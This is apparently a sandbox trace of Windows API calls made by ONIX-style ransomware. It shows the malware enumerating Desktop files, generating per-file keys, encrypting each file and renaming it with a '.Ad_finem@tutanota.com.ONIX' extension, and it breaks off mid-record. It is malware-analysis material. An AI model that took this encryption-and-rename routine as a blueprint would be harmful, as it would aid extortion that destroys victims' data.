SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv", dwFileAttributes=0x80) returned 1 [0129.550] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv") returned 72 [0129.550] GetProcessHeap () returned 0x410000 [0129.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x4d8e98 [0129.550] lstrcpyW (in: lpString1=0x4d8e98, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv" [0129.550] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.550] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=19498) returned 1 [0129.550] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4c2a [0129.550] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.550] GetProcessHeap () returned 0x410000 [0129.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8fa0 [0129.550] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.550] WriteFile (in: hFile=0x528, lpBuffer=0x4d8fa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8fa0*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.551] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.552] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.553] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c2a) returned 0x4e1b68 [0129.553] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c2a) returned 0xf70048 [0129.554] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.554] ReadFile (in: hFile=0x528, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x4c2a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x4c2a, lpOverlapped=0x0) returned 1 [0129.556] UnlockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4c2a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.556] CloseHandle (hObject=0x528) returned 1 [0129.557] GetProcessHeap () returned 0x410000 [0129.557] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8fa0 | out: hHeap=0x410000) returned 1 [0129.557] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\dnqvq4mjzolswzusoo.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\dnqvq4mjzolswzusoo.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.563] GetProcessHeap () returned 0x410000 [0129.563] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.563] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x874df000, ftCreationTime.dwHighDateTime=0x1d5e348, ftLastAccessTime.dwLowDateTime=0x6aa784f0, ftLastAccessTime.dwHighDateTime=0x1d5df0d, ftLastWriteTime.dwLowDateTime=0x6aa784f0, ftLastWriteTime.dwHighDateTime=0x1d5df0d, nFileSizeHigh=0x0, nFileSizeLow=0xabba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j DDcweL.flv", cAlternateFileName="JDDCWE~1.FLV")) returned 1 [0129.563] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\j ddcwel.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x528 [0129.563] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.563] LockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xabba, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.563] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.563] ReadFile (in: hFile=0x528, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.564] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.564] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.564] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.564] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.564] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv", dwFileAttributes=0x80) returned 1 [0129.565] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv") returned 62 [0129.565] GetProcessHeap () returned 0x410000 [0129.565] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x431d68 [0129.565] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv" [0129.565] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.565] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=43962) returned 1 [0129.565] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xabba [0129.565] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.565] GetProcessHeap () returned 0x410000 [0129.565] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.565] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.566] WriteFile (in: hFile=0x528, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.568] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.569] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.570] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xabba) returned 0xf70048 [0129.570] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xabba) returned 0xf7ac10 [0129.570] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.570] ReadFile (in: hFile=0x528, lpBuffer=0xf70048, nNumberOfBytesToRead=0xabba, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0xabba, lpOverlapped=0x0) returned 1 [0129.573] UnlockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xabba, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.573] CloseHandle (hObject=0x528) returned 1 [0129.573] GetProcessHeap () returned 0x410000 [0129.573] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.573] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\j ddcwel.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\j DDcweL.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\j ddcwel.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.576] GetProcessHeap () returned 0x410000 [0129.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.576] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3681c3a0, ftCreationTime.dwHighDateTime=0x1d5e6e9, ftLastAccessTime.dwLowDateTime=0x8aeba3c0, ftLastAccessTime.dwHighDateTime=0x1d5e6b7, ftLastWriteTime.dwLowDateTime=0x8aeba3c0, ftLastWriteTime.dwHighDateTime=0x1d5e6b7, nFileSizeHigh=0x0, nFileSizeLow=0x9bb2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kas3 X.mp3", cAlternateFileName="KAS3X~1.MP3")) returned 1 [0129.576] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\kas3 x.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x528 [0129.577] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.577] LockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9bb2, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.577] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.577] ReadFile (in: hFile=0x528, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.578] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.578] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.578] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.578] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.578] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3", dwFileAttributes=0x80) returned 1 [0129.578] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3") returned 60 [0129.578] GetProcessHeap () returned 0x410000 [0129.578] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0129.578] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3" [0129.578] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.578] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=39858) returned 1 [0129.578] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x9bb2 [0129.578] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.578] GetProcessHeap () returned 0x410000 [0129.578] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.578] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.579] WriteFile (in: hFile=0x528, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.581] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.582] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.583] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9bb2) returned 0xf70048 [0129.584] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9bb2) returned 0xf79c08 [0129.584] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.584] ReadFile (in: hFile=0x528, lpBuffer=0xf70048, nNumberOfBytesToRead=0x9bb2, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x9bb2, lpOverlapped=0x0) returned 1 [0129.586] UnlockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9bb2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.586] CloseHandle (hObject=0x528) returned 1 [0129.587] GetProcessHeap () returned 0x410000 [0129.587] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.587] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\kas3 x.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\kas3 X.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\kas3 x.mp3.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.590] GetProcessHeap () returned 0x410000 [0129.590] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.590] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3110d50, ftCreationTime.dwHighDateTime=0x1d5db30, ftLastAccessTime.dwLowDateTime=0x170f6240, ftLastAccessTime.dwHighDateTime=0x1d5e61a, ftLastWriteTime.dwLowDateTime=0x170f6240, ftLastWriteTime.dwHighDateTime=0x1d5e61a, nFileSizeHigh=0x0, nFileSizeLow=0x156f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PZdBNL.odt", cAlternateFileName="")) returned 1 [0129.590] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\pzdbnl.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x528 [0129.590] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.590] LockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x156f4, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.590] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.590] ReadFile (in: hFile=0x528, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.591] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.591] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.591] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.591] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.591] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt", dwFileAttributes=0x80) returned 1 [0129.591] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt") returned 60 [0129.591] GetProcessHeap () returned 0x410000 [0129.591] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0129.591] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt" [0129.591] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.592] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=87796) returned 1 [0129.592] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x156f4 [0129.592] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.592] GetProcessHeap () returned 0x410000 [0129.592] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.592] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.592] WriteFile (in: hFile=0x528, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.593] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.594] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x156f4) returned 0xf70048 [0129.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x156f4) returned 0xf85748 [0129.596] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.596] ReadFile (in: hFile=0x528, lpBuffer=0xf70048, nNumberOfBytesToRead=0x156f4, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x156f4, lpOverlapped=0x0) returned 1 [0129.599] UnlockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x156f4, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.599] CloseHandle (hObject=0x528) returned 1 [0129.601] GetProcessHeap () returned 0x410000 [0129.601] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.601] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\pzdbnl.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\PZdBNL.odt.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\pzdbnl.odt.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.604] GetProcessHeap () returned 0x410000 [0129.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.605] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x516019b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x516019b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, 